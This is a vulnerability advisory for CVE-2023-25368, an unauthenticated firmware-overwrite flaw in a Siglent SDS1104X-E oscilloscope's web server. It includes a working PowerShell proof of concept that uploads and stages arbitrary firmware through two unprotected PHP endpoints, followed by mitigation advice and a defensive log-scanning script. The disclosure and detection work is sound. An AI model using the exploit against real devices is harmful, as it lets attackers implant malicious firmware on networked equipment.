# CVE-2023-25368

Source: CVE/CVE-2023-25368.md at main · BretMcDanel/CVE

## Headline

Siglent SDS 1104X-E SDS1xx4X-E_V6.1.37R9.ADS is vulnerable to Incorrect Access Control. An unauthenticated attacker can overwrite firmware.
## Description

Siglent SDS 1104X-E SDS1xx4X-E_V6.1.37R9.ADS is vulnerable to Incorrect Access Control. An unauthenticated attacker can overwrite firmware.
## Discovery Information

- Date: December 2022
- Discoverer: Bret McDanel
## Versions

At least SDS1xx4X-E_V6.1.37R9.ADS, and possibly earlier. Reportedly fixed May 2023. It is unknown whether other devices have a similar flaw, as they were unavailable to the researcher at the time the research was performed.
## Background

The SIGLENT SDS1000X-E is a two- and four-channel oscilloscope. Its features are controlled by an embedded system running Linux. The oscilloscope has an Ethernet port and optional USB Wi-Fi, and has an embedded web server enabled.
## References

- https://siglent.com
## Vulnerability

CWE-284: Improper Access Control

## Affected Ports

- Web Port: 80 (tcp)
## Discussion

Two PHP scripts do not require authentication. One script can be used to upload firmware; the other will expand the firmware and ready it for installation at the next reboot.

The first script, /deviceupdate.php, requires the file to be sent as an application/octet-stream and to end in .ADS.

The next script, /device_read_write.php, accepts certain commands, one of which causes the firmware to be unpackaged and readied for installation. It relies upon information that is output from /deviceupdate.php.

The firmware is encrypted with a modified DES algorithm. However, this presents little challenge, as programs that unpack existing firmware files and allow repacking into new, valid firmware files have been public for over a decade. This process is documented at length on forums devoted to the oscilloscope.
## Proof of Concept

Language: PowerShell

```powershell
$firmware = "/path/to/firmware.ADS"
# $host is a read-only automatic variable in PowerShell, so the target is held in $target instead
$target = "http://ip-of-target"

try {
    # Upload firmware (-Form requires PowerShell 6.1 or later)
    $WebParams = @{
        Method      = "POST"
        Uri         = "${target}/deviceupdate.php"
        ContentType = "application/octet-stream"
        Form        = @{
            "in_device_version" = Get-Item -Path $firmware
        }
    }
    $resp = Invoke-WebRequest @WebParams -ErrorAction Stop
    $jsonData = ($resp.Content | ConvertFrom-Json)

    # Unpack firmware, using the path and version name returned by the upload script
    $cmd = "%7B%22path%22%3A%22$($jsonData.path)%22%2C%22versionname%22%3A%22$($jsonData.versionname)%22%2C%22type%22%3A%22SSG%22%2C%22to%22%3A%22127.0.0.1%22%7D"
    $WebParams = @{
        Method = "POST"
        Uri    = "${target}/device_read_write.php"
        Form   = @{
            cmd = $cmd
        }
    }
    Invoke-WebRequest @WebParams -ErrorAction Stop
} catch {
    Write-Error "Unable to write firmware $($_.Exception.Response.ReasonPhrase)"
    return
}
Write-Host "Firmware uploaded, reboot device to install new firmware (use CVE-2023-25367)"
```
## Mitigation

It is advised to upgrade to the current version of the firmware. Further, IoT devices such as oscilloscopes should be placed on a segregated network, and access to the affected ports should be blocked from untrusted hosts.
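Because neither /deviceupdate.php nor /device_read_write.php requires authentication, the practical defensive controls are the ones named above: restrict who can reach port 80 and watch for requests to those two scripts from anywhere else. The following script is an added example written for this advisory, not code from the repository or from Siglent. It scans web-server access-log lines (constructed samples, embedded inline) for POST requests to the two endpoints, rates each hit by whether the source address falls inside an operator-defined trusted network, and decodes the URL-encoded JSON `cmd` value described in the Discussion so that a firmware-unpack command (`"type":"SSG"` with `path` and `versionname`) can be told apart from other device commands. The log format (Common Log Format) and the trusted-network list are assumptions; the endpoint names and the `cmd` encoding come from the advisory.

```python
import ipaddress
import json
import re
from urllib.parse import unquote

# Constructed sample access-log lines in Common Log Format; not real device logs.
SAMPLE_LOG = [
    '10.0.5.23 - - [12/Dec/2022:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512',
    '192.168.77.9 - - [12/Dec/2022:10:02:15 +0000] "POST /deviceupdate.php HTTP/1.1" 200 88',
    '192.168.77.9 - - [12/Dec/2022:10:02:20 +0000] "POST /device_read_write.php HTTP/1.1" 200 12',
    '10.0.5.23 - - [12/Dec/2022:10:05:00 +0000] "GET /deviceupdate.php HTTP/1.1" 405 0',
]

# The two unauthenticated endpoints named in the advisory.
WATCHED = {
    "/deviceupdate.php": "firmware upload",
    "/device_read_write.php": "device command",
}

# Common Log Format: ip ident user [timestamp] "METHOD path protocol" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["path"].split("?", 1)[0]  # drop any query string
    rec["status"] = int(rec["status"])
    return rec


def scan_log(lines, trusted_nets):
    """Return alerts for POST requests to the watched endpoints.

    trusted_nets is an assumed operator-maintained list of CIDR strings; a hit
    from outside those networks is rated 'high', from inside 'info'.
    """
    nets = [ipaddress.ip_network(n) for n in trusted_nets]
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] not in WATCHED:
            continue
        src = ipaddress.ip_address(rec["ip"])
        trusted = any(src in n for n in nets)
        alerts.append({
            "ip": rec["ip"],
            "ts": rec["ts"],
            "path": rec["path"],
            "what": WATCHED[rec["path"]],
            "severity": "info" if trusted else "high",
        })
    return alerts


def decode_cmd(encoded):
    """Decode the URL-encoded JSON 'cmd' value sent to /device_read_write.php.

    Returns the parsed object, or None if the value is not a JSON object.
    """
    try:
        obj = json.loads(unquote(encoded))
    except (ValueError, TypeError):
        return None
    return obj if isinstance(obj, dict) else None


def is_firmware_unpack(cmd):
    """True when a decoded cmd is the unpack-and-stage command from the advisory."""
    return (
        isinstance(cmd, dict)
        and cmd.get("type") == "SSG"
        and "path" in cmd
        and "versionname" in cmd
    )


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG, ["10.0.5.0/24"]):
        print(f"[{alert['severity']}] {alert['ts']} {alert['ip']} -> {alert['path']} ({alert['what']})")
```

Where the proxy or IDS in front of the device records form bodies, `decode_cmd` can be run on the captured `cmd` value to confirm that a POST to /device_read_write.php was an unpack request rather than an ordinary device command; with plain access logs, the path plus an untrusted source address is already enough to raise the alert.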
## Related news

Siglent SDS 1104X-E SDS1xx4X-E_V6.1.37R9.ADS allows unfiltered user input resulting in Remote Code Execution (RCE) with the SCPI interface or web server.